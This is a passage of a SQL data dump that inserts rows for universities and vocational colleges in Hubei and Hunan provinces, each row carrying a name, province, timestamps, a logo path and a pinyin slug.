17:40:37','/images/school/1481.png','huazhongkejidaxue',0,NULL,NULL,0,NULL,NULL),(1482,'中国地质大学','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/1482.png','zhongguodizhidaxue',0,NULL,NULL,0,NULL,NULL),(1483,'武汉理工大学','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/1483.png','wuhanligongdaxue',0,NULL,NULL,0,NULL,NULL),(1484,'华中农业大学','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/1484.png','huazhongnongyedaxue',0,NULL,NULL,0,NULL,NULL),(1485,'华中师范大学','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/1485.png','huazhongshifandaxue',0,NULL,NULL,0,NULL,NULL),(1486,'中南财经政法大学','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/1486.png','zhongnancaijingzhengfadaxue',0,NULL,NULL,0,NULL,NULL),(1487,'中南民族大学','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/1487.png','zhongnanminzudaxue',0,NULL,NULL,0,NULL,NULL),(1488,'武汉科技大学','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','wuhankejidaxue',0,NULL,NULL,0,NULL,NULL),(1489,'长江大学','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','changjiangdaxue',0,NULL,NULL,0,NULL,NULL),(1490,'武汉工程大学','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','wuhangongchengdaxue',0,NULL,NULL,0,NULL,NULL),(1491,'武汉纺织大学','湖北','2014-04-23 00:00:00','2017-10-13 22:14:10','/images/school/default.png','wuhanfangzhidaxue',0,'武汉','武汉纺织大学5B625',0,NULL,NULL),(1492,'武汉轻工大学','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','wuhanqinggongdaxue',0,NULL,NULL,0,NULL,NULL),(1493,'湖北工业大学','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hubeigongyedaxue',0,NULL,NULL,0,NULL,NULL),(1494,'湖北中医药大学','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hubeizhongyiyaodaxue',0,NULL,NULL,0,NULL,NULL),(1495,'湖北大学','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hubeidaxue',0,NULL,NULL,0,NULL,NULL),(1496,'江汉大学','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','jianghandaxue',0,NULL,NULL,0,NULL,NULL),(1497,'三峡大学','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','sanxiadaxue',0,NULL,NULL,0,NULL,NULL),(1498,'湖北师范大学','湖北省','2014-04-23 00:00:00','2017-09-04 17:30:08','/images/school/default.png','hubeishifanxueyuan',0,NULL,NULL,0,NULL,NULL),(1499,'黄冈师范学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','huanggangshifanxueyuan',0,NULL,NULL,0,NULL,NULL),(1500,'湖北民族学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hubeiminzuxueyuan',0,NULL,NULL,0,NULL,NULL),(1501,'湖北文理学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hubeiwenlixueyuan',0,NULL,NULL,0,NULL,NULL),(1502,'武汉体育学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','wuhantiyuxueyuan',0,NULL,NULL,0,NULL,NULL),(1503,'湖北美术学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hubeimeishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1504,'湖北汽车工业学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hubeiqichegongyexueyuan',0,NULL,NULL,0,NULL,NULL),(1505,'湖北工程学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hubeigongchengxueyuan',0,NULL,NULL,0,NULL,NULL),(1506,'湖北理工学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hubeiligongxueyuan',0,NULL,NULL,0,NULL,NULL),(1507,'湖北科技学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hubeikejixueyuan',0,NULL,NULL,0,NULL,NULL),(1508,'湖北医药学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hubeiyiyaoxueyuan',0,NULL,NULL,0,NULL,NULL),(1509,'湖北警官学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hubeijingguanxueyuan',0,NULL,NULL,0,NULL,NULL),(1510,'武汉音乐学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','wuhanyinlexueyuan',0,NULL,NULL,0,NULL,NULL),(1511,'湖北经济学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hubeijingjixueyuan',0,NULL,NULL,0,NULL,NULL),(1512,'武汉商学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','wuhanshangxueyuan',0,NULL,NULL,0,NULL,NULL),(1513,'武汉东湖学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','wuhandonghuxueyuan',0,NULL,NULL,0,NULL,NULL),(1514,'汉口学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hankouxueyuan',0,NULL,NULL,0,NULL,NULL),(1515,'武昌理工学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','wuchangligongxueyuan',0,NULL,NULL,0,NULL,NULL),(1516,'武昌工学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','wuchanggongxueyuan',0,NULL,NULL,0,NULL,NULL),(1517,'武汉长江工商学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','wuhanchangjianggongshangxueyuan',0,NULL,NULL,0,NULL,NULL),(1518,'湖北第二师范学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hubeidiershifanxueyuan',0,NULL,NULL,0,NULL,NULL),(1519,'荆楚理工学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','jingchuligongxueyuan',0,NULL,NULL,0,NULL,NULL),(1520,'武汉生物工程学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','wuhanshengwugongchengxueyuan',0,NULL,NULL,0,NULL,NULL),(1521,'郧阳师范高等专科学校','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','yunyangshifangaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(1522,'湖北幼儿师范高等专科学校','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hubeiyouershifangaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(1523,'湖北中医药高等专科学校','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hubeizhongyiyaogaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(1524,'武汉职业技术学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','wuhanzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1525,'黄冈职业技术学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','huanggangzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1526,'长江职业学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','changjiangzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1527,'荆州理工职业学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','jingzhouligongzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1528,'湖北工业职业技术学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hubeigongyezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1529,'鄂州职业大学','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','ezhouzhiyedaxue',0,NULL,NULL,0,NULL,NULL),(1530,'武汉城市职业学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','wuhanchengshizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1531,'湖北职业技术学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hubeizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1532,'武汉船舶职业技术学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','wuhanchuanbozhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1533,'襄阳职业技术学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','xiangyangzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1534,'武汉工程职业技术学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','wuhangongchengzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1535,'武昌职业学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','wuchangzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1536,'三峡电力职业学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','sanxiadianlizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1537,'湖北科技职业学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hubeikejizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1538,'湖北青年职业学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hubeiqingnianzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1539,'黄石职业技术学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','huangshizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1540,'三峡旅游职业技术学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','sanxialvyouzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1541,'天门职业学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','tianmenzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1542,'湖北体育职业学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hubeitiyuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1543,'襄阳汽车职业技术学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','xiangyangqichezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1544,'恩施职业技术学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','enshizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1545,'武汉工贸职业学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','wuhangongmaozhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1546,'荆州职业技术学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','jingzhouzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1547,'仙桃职业学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','xiantaozhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1548,'湖北轻工职业技术学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hubeiqinggongzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1549,'湖北交通职业技术学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hubeijiaotongzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1550,'武汉航海职业技术学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','wuhanhanghaizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1551,'武汉铁路职业技术学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','wuhantieluzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1552,'武汉软件工程职业学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','wuhanruanjiangongchengzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1553,'湖北三峡职业技术学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hubeisanxiazhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1554,'随州职业技术学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','suizhouzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1555,'武汉电力职业技术学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','wuhandianlizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1556,'湖北水利水电职业技术学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hubeishuilishuidianzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1557,'湖北城市建设职业技术学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hubeichengshijianshezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1558,'武汉警官职业学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','wuhanjingguanzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1559,'湖北生物科技职业学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hubeishengwukejizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1560,'湖北开放职业学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hubeikaifangzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1561,'武汉科技职业学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','wuhankejizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1562,'武汉外语外事职业学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','wuhanwaiyuwaishizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1563,'武汉信息传播职业技术学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','wuhanxinxichuanbozhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1564,'武汉商贸职业学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','wuhanshangmaozhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1565,'湖北艺术职业学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hubeiyishuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1566,'武汉交通职业学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','wuhanjiaotongzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1567,'咸宁职业技术学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','xianningzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1568,'长江工程职业技术学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','changjianggongchengzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1569,'江汉艺术职业学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','jianghanyishuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1570,'武汉工业职业技术学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','wuhangongyezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1571,'武汉民政职业学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','wuhanminzhengzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1572,'鄂东职业技术学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','edongzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1573,'湖北财税职业学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hubeicaishuizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1574,'黄冈科技职业学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','huanggangkejizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1575,'湖北国土资源职业学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hubeiguotuziyuanzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1576,'湖北生态工程职业技术学院','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hubeishengtaigongchengzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1577,'湖南大学','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hunandaxue',0,NULL,NULL,1,NULL,'2018-01-01 10:00:00'),(1578,'中南大学','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','zhongnandaxue',0,NULL,NULL,1,NULL,'2018-01-01 10:00:00'),(1579,'湘潭大学','湖南','2014-04-23 00:00:00','2017-10-13 22:14:08','/images/school/default.png','xiangtandaxue',0,'湘潭','湘潭大学金翰林',1,NULL,'2018-01-01 10:00:00'),(1580,'吉首大学','湖南省','2014-04-23 00:00:00','2018-05-29 16:48:41','/images/school/default.png','jishoudaxue',0,NULL,NULL,1,NULL,'2018-05-29 16:48:41'),(1581,'湖南科技大学','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hunankejidaxue',0,NULL,NULL,1,NULL,'2018-01-01 10:00:00'),(1582,'长沙理工大学','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','changshaligongdaxue',0,NULL,NULL,1,NULL,'2018-01-01 10:00:00'),(1583,'湖南农业大学','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hunannongyedaxue',0,NULL,NULL,0,NULL,NULL),(1584,'湖南中医药大学','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hunanzhongyiyaodaxue',0,NULL,NULL,1,NULL,'2018-01-01 10:00:00'),(1585,'湖南师范大学','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/1585.png','hunanshifandaxue',0,NULL,NULL,1,NULL,'2018-01-01 10:00:00'),(1586,'南华大学','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','nanhuadaxue',0,NULL,NULL,1,NULL,'2018-01-01 10:00:00'),(1587,'湖南工业大学',NULL,'2014-04-23 00:00:00','2017-10-13 22:14:09','/images/school/1587.png','hunangongyedaxue',0,NULL,NULL,1,NULL,'2018-01-01 10:00:00'),(1588,'中南林业科技大学','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','zhongnanlinyekejidaxue',0,NULL,NULL,1,NULL,'2018-01-01 10:00:00'),(1589,'湖南理工学院','湖南省','2014-04-23 00:00:00','2018-06-01 16:38:46','/images/school/default.png','hunanligongxueyuan',0,NULL,NULL,1,NULL,'2018-06-01 16:38:46'),(1590,'湘南学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','xiangnanxueyuan',0,NULL,NULL,0,NULL,NULL),(1591,'衡阳师范学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hengyangshifanxueyuan',0,NULL,NULL,0,NULL,NULL),(1592,'邵阳学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','shaoyangxueyuan',0,NULL,NULL,1,NULL,'2018-01-01 10:00:00'),(1593,'怀化学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','huaihuaxueyuan',0,NULL,NULL,1,NULL,'2018-01-01 10:00:00'),(1594,'湖南文理学院','湖南省','2014-04-23 00:00:00','2018-05-30 16:26:46','/images/school/default.png','hunanwenlixueyuan',0,NULL,NULL,1,NULL,'2018-05-30 16:26:46'),(1595,'湖南科技学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hunankejixueyuan',0,NULL,NULL,1,NULL,'2018-01-01 10:00:00'),(1596,'湖南人文科技学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hunanrenwenkejixueyuan',0,NULL,NULL,0,NULL,NULL),(1597,'湖南商学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/1597.png','hunanshangxueyuan',0,NULL,NULL,1,NULL,'2018-01-01 10:00:00'),(1598,'长沙医学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','changshayixueyuan',0,NULL,NULL,0,NULL,NULL),(1599,'长沙学院','湖南省','2014-04-23 00:00:00','2016-08-01 18:21:18','/images/school/default.png','changshaxueyuan',0,NULL,NULL,1,NULL,'2018-01-01 10:00:00'),(1600,'湖南工程学院','湖南省','2014-04-23 00:00:00','2018-05-27 09:00:07','/images/school/default.png','hunangongchengxueyuan',0,NULL,NULL,1,NULL,'2018-05-27 09:00:07'),(1601,'湖南城市学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hunanchengshixueyuan',0,NULL,NULL,1,NULL,'2018-01-01 10:00:00'),(1602,'湖南工学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hunangongxueyuan',0,NULL,NULL,0,NULL,NULL),(1603,'湖南财政经济学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hunancaizhengjingjixueyuan',0,NULL,NULL,1,NULL,'2018-01-01 10:00:00'),(1604,'湖南警察学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hunanjingchaxueyuan',0,NULL,NULL,0,NULL,NULL),(1605,'湖南女子学院','湖南省','2014-04-23 00:00:00','2018-05-21 22:46:23','/images/school/default.png','hunannvzixueyuan',0,NULL,NULL,1,NULL,'2018-05-21 22:46:23'),(1606,'湖南第一师范学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hunandiyishifanxueyuan',0,NULL,NULL,0,NULL,NULL),(1607,'长沙师范学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','changshashifanxueyuan',0,NULL,NULL,0,NULL,NULL),(1608,'湖南涉外经济学院','湖南省','2014-04-23 00:00:00','2018-05-21 23:32:44','/images/school/default.png','hunanshewaijingjixueyuan',0,NULL,NULL,1,NULL,'2018-05-21 23:32:44'),(1609,'株洲师范高等专科学校','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','zhuzhoushifangaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(1610,'湖南税务高等专科学校','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hunanshuiwugaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(1611,'湖南幼儿师范高等专科学校','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hunanyouershifangaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(1612,'怀化医学高等专科学校','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','huaihuayixuegaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(1613,'湖南中医药高等专科学校','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hunanzhongyiyaogaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(1614,'邵阳医学高等专科学校','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','shaoyangyixuegaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(1615,'益阳医学高等专科学校','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','yiyangyixuegaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(1616,'长沙航空职业技术学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','changshahangkongzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1617,'长沙民政职业技术学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','changshaminzhengzhiyejishuxueyuan',0,NULL,NULL,1,NULL,'2018-01-01 10:00:00'),(1618,'湖南工业职业技术学院','湖南','2014-04-23 00:00:00','2017-10-13 22:14:09','/images/school/default.png','hunangongyezhiyejishuxueyuan',0,'长沙','湖南长沙市云麓区含浦街道',1,NULL,'2018-01-01 10:00:00'),(1619,'湖南信息职业技术学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hunanxinxizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1620,'湖南环境生物职业技术学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hunanhuanjingshengwuzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1621,'湖南冶金职业技术学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hunanyejinzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1622,'湖南生物机电职业技术学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hunanshengwujidianzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1623,'湖南外贸职业学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hunanwaimaozhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1624,'湖南邮电职业技术学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hunanyoudianzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1625,'湖南高速铁路职业技术学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hunangaosutieluzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1626,'湖南电气职业技术学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hunandianqizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1627,'湖南外国语职业学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hunanwaiguoyuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1628,'湖南都市职业学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hunandushizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1629,'湖南电子科技职业学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hunandianzikejizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1630,'湖南科技工业职业技术学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hunankejigongyezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1631,'湖南高尔夫旅游职业学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hunangaoerfulvyouzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1632,'湖南工商职业学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hunangongshangzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1633,'湖南三一工业职业技术学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hunansanyigongyezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1634,'长沙卫生职业学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','changshaweishengzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1635,'湖南食品药品职业学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hunanshipinyaopinzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1636,'湖南有色金属职业技术学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hunanyousejinshuzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1637,'湖南吉利汽车职业技术学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hunanjiliqichezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1638,'湖南大众传媒职业技术学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hunandazhongchuanmeizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1639,'永州职业技术学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','yongzhouzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1640,'湖南铁道职业技术学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hunantiedaozhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1641,'湖南科技职业学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hunankejizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1642,'湖南交通职业技术学院','湖南省','2014-04-23 00:00:00','2015-10-16 